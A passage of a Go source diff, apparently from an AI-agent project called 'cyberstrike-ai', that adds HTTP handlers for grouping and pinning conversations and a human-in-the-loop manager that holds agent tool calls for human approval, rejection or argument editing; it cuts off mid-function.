func (h *GroupHandler) AddConversationToGroup(c *gin.Context) {
|
||||
var req AddConversationToGroupRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.db.AddConversationToGroup(req.ConversationID, req.GroupID); err != nil {
|
||||
h.logger.Error("添加对话到分组失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"message": "添加成功"})
|
||||
}
|
||||
|
||||
// RemoveConversationFromGroup 从分组中移除对话
|
||||
func (h *GroupHandler) RemoveConversationFromGroup(c *gin.Context) {
|
||||
conversationID := c.Param("conversationId")
|
||||
groupID := c.Param("id")
|
||||
|
||||
if err := h.db.RemoveConversationFromGroup(conversationID, groupID); err != nil {
|
||||
h.logger.Error("从分组中移除对话失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"message": "移除成功"})
|
||||
}
|
||||
|
||||
// GroupConversation 分组对话响应结构
|
||||
type GroupConversation struct {
|
||||
ID string `json:"id"`
|
||||
Title string `json:"title"`
|
||||
Pinned bool `json:"pinned"`
|
||||
GroupPinned bool `json:"groupPinned"`
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
UpdatedAt time.Time `json:"updatedAt"`
|
||||
}
|
||||
|
||||
// GetGroupConversations 获取分组中的所有对话
|
||||
func (h *GroupHandler) GetGroupConversations(c *gin.Context) {
|
||||
groupID := c.Param("id")
|
||||
searchQuery := c.Query("search") // 获取搜索参数
|
||||
|
||||
var conversations []*database.Conversation
|
||||
var err error
|
||||
|
||||
// 如果有搜索关键词,使用搜索方法;否则使用普通方法
|
||||
if searchQuery != "" {
|
||||
conversations, err = h.db.SearchConversationsByGroup(groupID, searchQuery)
|
||||
} else {
|
||||
conversations, err = h.db.GetConversationsByGroup(groupID)
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
h.logger.Error("获取分组对话失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 获取每个对话在分组中的置顶状态
|
||||
groupConvs := make([]GroupConversation, 0, len(conversations))
|
||||
for _, conv := range conversations {
|
||||
// 查询分组内置顶状态
|
||||
var groupPinned int
|
||||
err := h.db.QueryRow(
|
||||
"SELECT COALESCE(pinned, 0) FROM conversation_group_mappings WHERE conversation_id = ? AND group_id = ?",
|
||||
conv.ID, groupID,
|
||||
).Scan(&groupPinned)
|
||||
if err != nil {
|
||||
h.logger.Warn("查询分组内置顶状态失败", zap.String("conversationId", conv.ID), zap.Error(err))
|
||||
groupPinned = 0
|
||||
}
|
||||
|
||||
groupConvs = append(groupConvs, GroupConversation{
|
||||
ID: conv.ID,
|
||||
Title: conv.Title,
|
||||
Pinned: conv.Pinned,
|
||||
GroupPinned: groupPinned != 0,
|
||||
CreatedAt: conv.CreatedAt,
|
||||
UpdatedAt: conv.UpdatedAt,
|
||||
})
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, groupConvs)
|
||||
}
|
||||
|
||||
// GetAllMappings 批量获取所有分组映射(消除前端 N+1 请求)
|
||||
func (h *GroupHandler) GetAllMappings(c *gin.Context) {
|
||||
mappings, err := h.db.GetAllGroupMappings()
|
||||
if err != nil {
|
||||
h.logger.Error("获取分组映射失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, mappings)
|
||||
}
|
||||
|
||||
// UpdateConversationPinnedRequest 更新对话置顶状态请求
|
||||
type UpdateConversationPinnedRequest struct {
|
||||
Pinned bool `json:"pinned"`
|
||||
}
|
||||
|
||||
// UpdateConversationPinned 更新对话置顶状态
|
||||
func (h *GroupHandler) UpdateConversationPinned(c *gin.Context) {
|
||||
conversationID := c.Param("id")
|
||||
|
||||
var req UpdateConversationPinnedRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.db.UpdateConversationPinned(conversationID, req.Pinned); err != nil {
|
||||
h.logger.Error("更新对话置顶状态失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"message": "更新成功"})
|
||||
}
|
||||
|
||||
// UpdateGroupPinnedRequest 更新分组置顶状态请求
|
||||
type UpdateGroupPinnedRequest struct {
|
||||
Pinned bool `json:"pinned"`
|
||||
}
|
||||
|
||||
// UpdateGroupPinned 更新分组置顶状态
|
||||
func (h *GroupHandler) UpdateGroupPinned(c *gin.Context) {
|
||||
groupID := c.Param("id")
|
||||
|
||||
var req UpdateGroupPinnedRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.db.UpdateGroupPinned(groupID, req.Pinned); err != nil {
|
||||
h.logger.Error("更新分组置顶状态失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"message": "更新成功"})
|
||||
}
|
||||
|
||||
// UpdateConversationPinnedInGroupRequest 更新分组对话置顶状态请求
|
||||
type UpdateConversationPinnedInGroupRequest struct {
|
||||
Pinned bool `json:"pinned"`
|
||||
}
|
||||
|
||||
// UpdateConversationPinnedInGroup 更新对话在分组中的置顶状态
|
||||
func (h *GroupHandler) UpdateConversationPinnedInGroup(c *gin.Context) {
|
||||
groupID := c.Param("id")
|
||||
conversationID := c.Param("conversationId")
|
||||
|
||||
var req UpdateConversationPinnedInGroupRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.db.UpdateConversationPinnedInGroup(conversationID, groupID, req.Pinned); err != nil {
|
||||
h.logger.Error("更新分组对话置顶状态失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"message": "更新成功"})
|
||||
}
|
||||
@@ -0,0 +1,792 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"database/sql"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"math"
|
||||
"net/http"
|
||||
"strconv"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/multiagent"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
type hitlRuntimeConfig struct {
|
||||
Enabled bool
|
||||
Mode string
|
||||
SensitiveTools map[string]struct{}
|
||||
Timeout time.Duration
|
||||
}
|
||||
|
||||
type hitlDecision struct {
|
||||
Decision string
|
||||
Comment string
|
||||
EditedArguments map[string]interface{}
|
||||
}
|
||||
|
||||
type pendingInterrupt struct {
|
||||
ConversationID string
|
||||
InterruptID string
|
||||
Mode string
|
||||
ToolName string
|
||||
ToolCallID string
|
||||
decideCh chan hitlDecision
|
||||
}
|
||||
|
||||
type HITLManager struct {
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
|
||||
mu sync.RWMutex
|
||||
runtime map[string]hitlRuntimeConfig
|
||||
pending map[string]*pendingInterrupt
|
||||
}
|
||||
|
||||
func NewHITLManager(db *database.DB, logger *zap.Logger) *HITLManager {
|
||||
return &HITLManager{
|
||||
db: db,
|
||||
logger: logger,
|
||||
runtime: make(map[string]hitlRuntimeConfig),
|
||||
pending: make(map[string]*pendingInterrupt),
|
||||
}
|
||||
}
|
||||
|
||||
func (m *HITLManager) EnsureSchema() error {
|
||||
if _, err := m.db.Exec(`
|
||||
CREATE TABLE IF NOT EXISTS hitl_interrupts (
|
||||
id TEXT PRIMARY KEY,
|
||||
conversation_id TEXT NOT NULL,
|
||||
message_id TEXT,
|
||||
mode TEXT NOT NULL,
|
||||
tool_name TEXT NOT NULL,
|
||||
tool_call_id TEXT,
|
||||
payload TEXT,
|
||||
status TEXT NOT NULL,
|
||||
decision TEXT,
|
||||
decision_comment TEXT,
|
||||
created_at DATETIME NOT NULL,
|
||||
decided_at DATETIME
|
||||
);`); err != nil {
|
||||
return err
|
||||
}
|
||||
_, err := m.db.Exec(`
|
||||
CREATE TABLE IF NOT EXISTS hitl_conversation_configs (
|
||||
conversation_id TEXT PRIMARY KEY,
|
||||
enabled INTEGER NOT NULL DEFAULT 0,
|
||||
mode TEXT NOT NULL DEFAULT 'off',
|
||||
sensitive_tools TEXT NOT NULL DEFAULT '[]',
|
||||
timeout_seconds INTEGER NOT NULL DEFAULT 0,
|
||||
updated_at DATETIME NOT NULL
|
||||
);`)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// On startup, cancel all orphaned pending interrupts from previous process.
|
||||
// Their in-memory channels are gone, so they can never be resolved.
|
||||
res, err := m.db.Exec(`UPDATE hitl_interrupts SET status='cancelled', decision='reject',
|
||||
decision_comment='process restarted', decided_at=CURRENT_TIMESTAMP WHERE status='pending'`)
|
||||
if err != nil {
|
||||
m.logger.Warn("failed to cancel orphaned HITL interrupts", zap.Error(err))
|
||||
} else if n, _ := res.RowsAffected(); n > 0 {
|
||||
m.logger.Info("cancelled orphaned HITL interrupts from previous process", zap.Int64("count", n))
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func normalizeHitlMode(mode string) string {
|
||||
v := strings.ToLower(strings.TrimSpace(mode))
|
||||
if v == "" {
|
||||
return "approval"
|
||||
}
|
||||
switch v {
|
||||
case "off":
|
||||
return "off"
|
||||
case "feedback", "followup":
|
||||
return "approval"
|
||||
case "approval", "review_edit":
|
||||
return v
|
||||
default:
|
||||
return "approval"
|
||||
}
|
||||
}
|
||||
|
||||
func (m *HITLManager) ActivateConversation(conversationID string, req *HITLRequest) {
|
||||
if req == nil || !req.Enabled {
|
||||
m.DeactivateConversation(conversationID)
|
||||
return
|
||||
}
|
||||
tools := make(map[string]struct{})
|
||||
for _, t := range req.SensitiveTools {
|
||||
n := strings.ToLower(strings.TrimSpace(t))
|
||||
if n != "" {
|
||||
tools[n] = struct{}{}
|
||||
}
|
||||
}
|
||||
// timeout <= 0 means wait forever (no timeout).
|
||||
timeout := time.Duration(0)
|
||||
if req.TimeoutSeconds > 0 {
|
||||
timeout = time.Duration(req.TimeoutSeconds) * time.Second
|
||||
}
|
||||
m.mu.Lock()
|
||||
m.runtime[conversationID] = hitlRuntimeConfig{
|
||||
Enabled: true,
|
||||
Mode: normalizeHitlMode(req.Mode),
|
||||
SensitiveTools: tools,
|
||||
Timeout: timeout,
|
||||
}
|
||||
m.mu.Unlock()
|
||||
}
|
||||
|
||||
func (m *HITLManager) DeactivateConversation(conversationID string) {
|
||||
m.mu.Lock()
|
||||
delete(m.runtime, conversationID)
|
||||
m.mu.Unlock()
|
||||
}
|
||||
|
||||
// hitlConfigGlobalToolWhitelist 来自 config.yaml hitl.tool_whitelist(去重、去空)。
|
||||
func (h *AgentHandler) hitlConfigGlobalToolWhitelist() []string {
|
||||
if h == nil || h.config == nil {
|
||||
return nil
|
||||
}
|
||||
raw := h.config.Hitl.ToolWhitelist
|
||||
if len(raw) == 0 {
|
||||
return nil
|
||||
}
|
||||
seen := make(map[string]struct{})
|
||||
out := make([]string, 0, len(raw))
|
||||
for _, t := range raw {
|
||||
n := strings.ToLower(strings.TrimSpace(t))
|
||||
if n == "" {
|
||||
continue
|
||||
}
|
||||
if _, ok := seen[n]; ok {
|
||||
continue
|
||||
}
|
||||
seen[n] = struct{}{}
|
||||
out = append(out, strings.TrimSpace(t))
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
// hitlRequestWithMergedConfigWhitelist 将会话/API 中的白名单与 config.yaml 全局白名单合并(并集),仅用于运行时 Activate;不写入数据库。
|
||||
func (h *AgentHandler) hitlRequestWithMergedConfigWhitelist(req *HITLRequest) *HITLRequest {
|
||||
gw := h.hitlConfigGlobalToolWhitelist()
|
||||
if len(gw) == 0 {
|
||||
return req
|
||||
}
|
||||
if req == nil {
|
||||
return nil
|
||||
}
|
||||
seen := make(map[string]struct{})
|
||||
union := make([]string, 0, len(gw)+len(req.SensitiveTools))
|
||||
for _, t := range gw {
|
||||
n := strings.ToLower(strings.TrimSpace(t))
|
||||
if n == "" {
|
||||
continue
|
||||
}
|
||||
if _, ok := seen[n]; ok {
|
||||
continue
|
||||
}
|
||||
seen[n] = struct{}{}
|
||||
union = append(union, strings.TrimSpace(t))
|
||||
}
|
||||
for _, t := range req.SensitiveTools {
|
||||
n := strings.ToLower(strings.TrimSpace(t))
|
||||
if n == "" {
|
||||
continue
|
||||
}
|
||||
if _, ok := seen[n]; ok {
|
||||
continue
|
||||
}
|
||||
seen[n] = struct{}{}
|
||||
union = append(union, strings.TrimSpace(t))
|
||||
}
|
||||
out := *req
|
||||
out.SensitiveTools = union
|
||||
return &out
|
||||
}
|
||||
|
||||
func (m *HITLManager) shouldInterrupt(conversationID, toolName string) (hitlRuntimeConfig, bool) {
|
||||
m.mu.RLock()
|
||||
cfg, ok := m.runtime[conversationID]
|
||||
m.mu.RUnlock()
|
||||
if !ok || !cfg.Enabled {
|
||||
return hitlRuntimeConfig{}, false
|
||||
}
|
||||
// 语义:SensitiveTools 现在作为“白名单(免审批工具)”
|
||||
// 空白名单 => 全部工具都需要审批
|
||||
if len(cfg.SensitiveTools) == 0 {
|
||||
return cfg, true
|
||||
}
|
||||
_, inWhitelist := cfg.SensitiveTools[strings.ToLower(strings.TrimSpace(toolName))]
|
||||
return cfg, !inWhitelist
|
||||
}
|
||||
|
||||
// NeedsToolApproval 与 Agent 工具层 shouldInterrupt 语义一致:仅当该会话已开启人机协同且工具不在免审批白名单时为 true。
|
||||
func (m *HITLManager) NeedsToolApproval(conversationID, toolName string) bool {
|
||||
if m == nil {
|
||||
return false
|
||||
}
|
||||
_, need := m.shouldInterrupt(conversationID, toolName)
|
||||
return need
|
||||
}
|
||||
|
||||
func (m *HITLManager) CreatePendingInterrupt(conversationID, assistantMessageID, mode, toolName, toolCallID, payload string) (*pendingInterrupt, error) {
|
||||
now := time.Now()
|
||||
id := "hitl_" + strings.ReplaceAll(uuid.New().String(), "-", "")
|
||||
if _, err := m.db.Exec(`INSERT INTO hitl_interrupts
|
||||
(id, conversation_id, message_id, mode, tool_name, tool_call_id, payload, status, created_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?, ?, 'pending', ?)`,
|
||||
id, conversationID, assistantMessageID, mode, toolName, toolCallID, payload, now); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
// 刷新页面后侧栏依赖 DB 配置;若仅内存 Activate 未落库,会导致「有待审批却显示关闭」
|
||||
_ = m.ensureConversationHITLModePersisted(conversationID, mode)
|
||||
p := &pendingInterrupt{
|
||||
ConversationID: conversationID,
|
||||
InterruptID: id,
|
||||
Mode: normalizeHitlMode(mode),
|
||||
ToolName: toolName,
|
||||
ToolCallID: toolCallID,
|
||||
decideCh: make(chan hitlDecision, 1),
|
||||
}
|
||||
m.mu.Lock()
|
||||
m.pending[id] = p
|
||||
m.mu.Unlock()
|
||||
return p, nil
|
||||
}
|
||||
|
||||
// ensureConversationHITLModePersisted 在产生待审批时把 mode 写入 hitl_conversation_configs,避免刷新后 GET 配置仍为关闭。
|
||||
func (m *HITLManager) ensureConversationHITLModePersisted(conversationID, interruptMode string) error {
|
||||
if strings.TrimSpace(conversationID) == "" {
|
||||
return nil
|
||||
}
|
||||
nm := normalizeHitlMode(interruptMode)
|
||||
if nm == "off" {
|
||||
return nil
|
||||
}
|
||||
cfg, err := m.LoadConversationConfig(conversationID)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if cfg.Enabled && normalizeHitlMode(cfg.Mode) == nm {
|
||||
return nil
|
||||
}
|
||||
cfg.Enabled = true
|
||||
cfg.Mode = nm
|
||||
if cfg.TimeoutSeconds < 0 {
|
||||
cfg.TimeoutSeconds = 0
|
||||
}
|
||||
return m.SaveConversationConfig(conversationID, cfg)
|
||||
}
|
||||
|
||||
// PendingHITLInterruptMode 返回该会话最新一条 pending 中断的协同模式(用于 GET 配置时与库内「关闭」状态对齐)。
|
||||
func (m *HITLManager) PendingHITLInterruptMode(conversationID string) (string, bool) {
|
||||
if strings.TrimSpace(conversationID) == "" {
|
||||
return "", false
|
||||
}
|
||||
var mode string
|
||||
err := m.db.QueryRow(`SELECT mode FROM hitl_interrupts WHERE conversation_id = ? AND status = 'pending' ORDER BY created_at DESC LIMIT 1`, conversationID).
|
||||
Scan(&mode)
|
||||
if err != nil {
|
||||
if errors.Is(err, sql.ErrNoRows) {
|
||||
return "", false
|
||||
}
|
||||
return "", false
|
||||
}
|
||||
mode = strings.TrimSpace(mode)
|
||||
if mode == "" {
|
||||
return "", false
|
||||
}
|
||||
return mode, true
|
||||
}
|
||||
|
||||
func hitlStoredConfigEffective(cfg *HITLRequest) bool {
|
||||
if cfg == nil {
|
||||
return false
|
||||
}
|
||||
if cfg.Enabled {
|
||||
return true
|
||||
}
|
||||
return normalizeHitlMode(cfg.Mode) != "off"
|
||||
}
|
||||
|
||||
func (m *HITLManager) ResolveInterrupt(interruptID, decision, comment string, editedArguments map[string]interface{}) error {
|
||||
decision = strings.ToLower(strings.TrimSpace(decision))
|
||||
if decision != "approve" && decision != "reject" {
|
||||
return errors.New("decision must be approve/reject")
|
||||
}
|
||||
m.mu.RLock()
|
||||
p, ok := m.pending[interruptID]
|
||||
m.mu.RUnlock()
|
||||
if !ok {
|
||||
return errors.New("interrupt not found or already resolved")
|
||||
}
|
||||
d := hitlDecision{
|
||||
Decision: decision,
|
||||
Comment: strings.TrimSpace(comment),
|
||||
EditedArguments: editedArguments,
|
||||
}
|
||||
select {
|
||||
case p.decideCh <- d:
|
||||
return nil
|
||||
default:
|
||||
return errors.New("interrupt already resolved or decision channel busy")
|
||||
}
|
||||
}
|
||||
|
||||
func (m *HITLManager) SaveConversationConfig(conversationID string, req *HITLRequest) error {
|
||||
if strings.TrimSpace(conversationID) == "" {
|
||||
return errors.New("conversationId is required")
|
||||
}
|
||||
if req == nil {
|
||||
req = &HITLRequest{Enabled: false, Mode: "off", TimeoutSeconds: 0}
|
||||
}
|
||||
mode := normalizeHitlMode(req.Mode)
|
||||
if !req.Enabled {
|
||||
mode = "off"
|
||||
}
|
||||
tools, _ := json.Marshal(req.SensitiveTools)
|
||||
timeout := req.TimeoutSeconds
|
||||
if timeout < 0 {
|
||||
timeout = 0
|
||||
}
|
||||
_, err := m.db.Exec(`INSERT INTO hitl_conversation_configs
|
||||
(conversation_id, enabled, mode, sensitive_tools, timeout_seconds, updated_at)
|
||||
VALUES (?, ?, ?, ?, ?, ?)
|
||||
ON CONFLICT(conversation_id) DO UPDATE SET
|
||||
enabled=excluded.enabled, mode=excluded.mode, sensitive_tools=excluded.sensitive_tools, timeout_seconds=excluded.timeout_seconds, updated_at=excluded.updated_at`,
|
||||
conversationID, boolToInt(req.Enabled), mode, string(tools), timeout, time.Now())
|
||||
return err
|
||||
}
|
||||
|
||||
func (m *HITLManager) LoadConversationConfig(conversationID string) (*HITLRequest, error) {
|
||||
var enabledInt int
|
||||
var mode, toolsJSON string
|
||||
var timeout int
|
||||
err := m.db.QueryRow(`SELECT enabled, mode, sensitive_tools, timeout_seconds FROM hitl_conversation_configs WHERE conversation_id = ?`, conversationID).
|
||||
Scan(&enabledInt, &mode, &toolsJSON, &timeout)
|
||||
if errors.Is(err, sql.ErrNoRows) {
|
||||
return &HITLRequest{Enabled: false, Mode: "off", SensitiveTools: []string{}, TimeoutSeconds: 0}, nil
|
||||
}
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if timeout < 0 {
|
||||
timeout = 0
|
||||
}
|
||||
tools := make([]string, 0)
|
||||
_ = json.Unmarshal([]byte(toolsJSON), &tools)
|
||||
return &HITLRequest{
|
||||
Enabled: enabledInt == 1,
|
||||
Mode: mode,
|
||||
SensitiveTools: tools,
|
||||
TimeoutSeconds: timeout,
|
||||
}, nil
|
||||
}
|
||||
|
||||
func (m *HITLManager) waitDecision(ctx context.Context, p *pendingInterrupt, timeout time.Duration) (hitlDecision, error) {
|
||||
defer func() {
|
||||
m.mu.Lock()
|
||||
delete(m.pending, p.InterruptID)
|
||||
m.mu.Unlock()
|
||||
}()
|
||||
var timeoutCh <-chan time.Time
|
||||
if timeout > 0 {
|
||||
timer := time.NewTimer(timeout)
|
||||
defer timer.Stop()
|
||||
timeoutCh = timer.C
|
||||
}
|
||||
select {
|
||||
case d := <-p.decideCh:
|
||||
// 只有 review_edit 模式允许改参;其他模式一律忽略 edited arguments
|
||||
if p.Mode != "review_edit" && len(d.EditedArguments) > 0 {
|
||||
d.EditedArguments = nil
|
||||
}
|
||||
_, _ = m.db.Exec(`UPDATE hitl_interrupts SET status='decided', decision=?, decision_comment=?, decided_at=? WHERE id=?`,
|
||||
d.Decision, d.Comment, time.Now(), p.InterruptID)
|
||||
return d, nil
|
||||
case <-timeoutCh:
|
||||
_, _ = m.db.Exec(`UPDATE hitl_interrupts SET status='timeout', decision='approve', decision_comment='timeout auto approve', decided_at=? WHERE id=?`,
|
||||
time.Now(), p.InterruptID)
|
||||
return hitlDecision{Decision: "approve", Comment: "timeout auto approve"}, nil
|
||||
case <-ctx.Done():
|
||||
_, _ = m.db.Exec(`UPDATE hitl_interrupts SET status='cancelled', decision='reject', decision_comment='task cancelled', decided_at=? WHERE id=?`,
|
||||
time.Now(), p.InterruptID)
|
||||
return hitlDecision{Decision: "reject", Comment: "task cancelled"}, ctx.Err()
|
||||
}
|
||||
}
|
||||
|
||||
func (h *AgentHandler) activateHITLForConversation(conversationID string, req *HITLRequest) {
|
||||
if h.hitlManager == nil {
|
||||
return
|
||||
}
|
||||
if req == nil {
|
||||
cfg, err := h.hitlManager.LoadConversationConfig(conversationID)
|
||||
if err == nil {
|
||||
req = cfg
|
||||
}
|
||||
}
|
||||
h.hitlManager.ActivateConversation(conversationID, h.hitlRequestWithMergedConfigWhitelist(req))
|
||||
}
|
||||
|
||||
func (h *AgentHandler) waitHITLApproval(runCtx context.Context, cancelRun context.CancelCauseFunc, conversationID, assistantMessageID, toolName, toolCallID string, payload map[string]interface{}, sendEventFunc func(eventType, message string, data interface{})) (*hitlDecision, error) {
|
||||
cfg, need := h.hitlManager.shouldInterrupt(conversationID, toolName)
|
||||
if !need {
|
||||
return nil, nil
|
||||
}
|
||||
payloadRaw, _ := json.Marshal(payload)
|
||||
p, err := h.hitlManager.CreatePendingInterrupt(conversationID, assistantMessageID, cfg.Mode, toolName, toolCallID, string(payloadRaw))
|
||||
if err != nil {
|
||||
h.logger.Warn("创建 HITL 中断失败", zap.Error(err))
|
||||
return nil, err
|
||||
}
|
||||
if sendEventFunc != nil {
|
||||
sendEventFunc("hitl_interrupt", "命中人机协同审批", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"interruptId": p.InterruptID,
|
||||
"mode": cfg.Mode,
|
||||
"toolName": toolName,
|
||||
"toolCallId": toolCallID,
|
||||
"payload": payload,
|
||||
})
|
||||
}
|
||||
d, waitErr := h.hitlManager.waitDecision(runCtx, p, cfg.Timeout)
|
||||
if waitErr != nil {
|
||||
if cancelRun != nil && (errors.Is(waitErr, context.Canceled) || errors.Is(waitErr, context.DeadlineExceeded)) {
|
||||
cause := context.Cause(runCtx)
|
||||
switch {
|
||||
case errors.Is(cause, ErrTaskCancelled):
|
||||
cancelRun(ErrTaskCancelled)
|
||||
case cause != nil:
|
||||
cancelRun(cause)
|
||||
case errors.Is(waitErr, context.DeadlineExceeded):
|
||||
cancelRun(context.DeadlineExceeded)
|
||||
default:
|
||||
cancelRun(ErrTaskCancelled)
|
||||
}
|
||||
}
|
||||
return nil, waitErr
|
||||
}
|
||||
if d.Decision == "reject" {
|
||||
if sendEventFunc != nil {
|
||||
sendEventFunc("hitl_rejected", "人工拒绝本次工具调用,模型将基于反馈继续迭代", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"interruptId": p.InterruptID,
|
||||
"toolName": toolName,
|
||||
"comment": d.Comment,
|
||||
})
|
||||
}
|
||||
return &d, nil
|
||||
}
|
||||
if sendEventFunc != nil {
|
||||
sendEventFunc("hitl_resumed", "人工确认通过,继续执行", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"interruptId": p.InterruptID,
|
||||
"toolName": toolName,
|
||||
"comment": d.Comment,
|
||||
"editedArgs": d.EditedArguments,
|
||||
})
|
||||
}
|
||||
return &d, nil
|
||||
}
|
||||
|
||||
func (h *AgentHandler) handleHITLToolCall(runCtx context.Context, cancelRun context.CancelCauseFunc, conversationID, assistantMessageID string, data map[string]interface{}, sendEventFunc func(eventType, message string, data interface{})) {
|
||||
if h.hitlManager == nil {
|
||||
return
|
||||
}
|
||||
toolName, _ := data["toolName"].(string)
|
||||
toolCallID, _ := data["toolCallId"].(string)
|
||||
d, err := h.waitHITLApproval(runCtx, cancelRun, conversationID, assistantMessageID, toolName, toolCallID, data, sendEventFunc)
|
||||
if err != nil || d == nil {
|
||||
return
|
||||
}
|
||||
if len(d.EditedArguments) > 0 {
|
||||
if argsObj, ok := data["argumentsObj"].(map[string]interface{}); ok {
|
||||
for k := range argsObj {
|
||||
delete(argsObj, k)
|
||||
}
|
||||
for k, v := range d.EditedArguments {
|
||||
argsObj[k] = v
|
||||
}
|
||||
if b, mErr := json.Marshal(argsObj); mErr == nil {
|
||||
data["arguments"] = string(b)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (h *AgentHandler) ListHITLPending(c *gin.Context) {
|
||||
conversationID := strings.TrimSpace(c.Query("conversationId"))
|
||||
status := strings.TrimSpace(c.Query("status"))
|
||||
if status == "" {
|
||||
status = "pending"
|
||||
}
|
||||
page, _ := strconv.Atoi(c.DefaultQuery("page", "1"))
|
||||
if page < 1 {
|
||||
page = 1
|
||||
}
|
||||
pageSize, _ := strconv.Atoi(c.DefaultQuery("pageSize", "20"))
|
||||
pageSize = int(math.Max(1, math.Min(float64(pageSize), 200)))
|
||||
offset := (page - 1) * pageSize
|
||||
q := `SELECT id, conversation_id, message_id, mode, tool_name, tool_call_id, payload, status, decision, decision_comment, created_at, decided_at FROM hitl_interrupts WHERE 1=1`
|
||||
args := []interface{}{}
|
||||
if conversationID != "" {
|
||||
q += " AND conversation_id = ?"
|
||||
args = append(args, conversationID)
|
||||
}
|
||||
if status != "all" {
|
||||
q += " AND status = ?"
|
||||
args = append(args, status)
|
||||
}
|
||||
q += " ORDER BY created_at DESC LIMIT ? OFFSET ?"
|
||||
args = append(args, pageSize, offset)
|
||||
rows, err := h.db.Query(q, args...)
|
||||
if err != nil {
|
||||
c.JSON(500, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
defer rows.Close()
|
||||
items := make([]map[string]interface{}, 0)
|
||||
for rows.Next() {
|
||||
var id, cid, mode, toolName, toolCallID, payload, rowStatus string
|
||||
var messageID sql.NullString
|
||||
var decision, comment sql.NullString
|
||||
var createdAt time.Time
|
||||
var decidedAt sql.NullTime
|
||||
if err := rows.Scan(&id, &cid, &messageID, &mode, &toolName, &toolCallID, &payload, &rowStatus, &decision, &comment, &createdAt, &decidedAt); err != nil {
|
||||
continue
|
||||
}
|
||||
msgID := ""
|
||||
if messageID.Valid {
|
||||
msgID = messageID.String
|
||||
}
|
||||
items = append(items, map[string]interface{}{
|
||||
"id": id,
|
||||
"conversationId": cid,
|
||||
"messageId": msgID,
|
||||
"mode": mode,
|
||||
"toolName": toolName,
|
||||
"toolCallId": toolCallID,
|
||||
"payload": payload,
|
||||
"status": rowStatus,
|
||||
"decision": decision.String,
|
||||
"comment": comment.String,
|
||||
"createdAt": createdAt,
|
||||
"decidedAt": func() interface{} {
|
||||
if decidedAt.Valid {
|
||||
return decidedAt.Time
|
||||
}
|
||||
return nil
|
||||
}(),
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"items": items, "page": page, "pageSize": pageSize})
|
||||
}
|
||||
|
||||
type hitlDecisionReq struct {
|
||||
InterruptID string `json:"interruptId" binding:"required"`
|
||||
Decision string `json:"decision" binding:"required"`
|
||||
Comment string `json:"comment,omitempty"`
|
||||
EditedArguments map[string]interface{} `json:"editedArguments,omitempty"`
|
||||
}
|
||||
|
||||
func (h *AgentHandler) DecideHITLInterrupt(c *gin.Context) {
|
||||
var req hitlDecisionReq
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(400, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if h.hitlManager == nil {
|
||||
c.JSON(500, gin.H{"error": "hitl manager unavailable"})
|
||||
return
|
||||
}
|
||||
if err := h.hitlManager.ResolveInterrupt(req.InterruptID, req.Decision, req.Comment, req.EditedArguments); err != nil {
|
||||
c.JSON(http.StatusConflict, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "hitl", "decision", "HITL 审批决策", "hitl_interrupt", req.InterruptID, map[string]interface{}{
|
||||
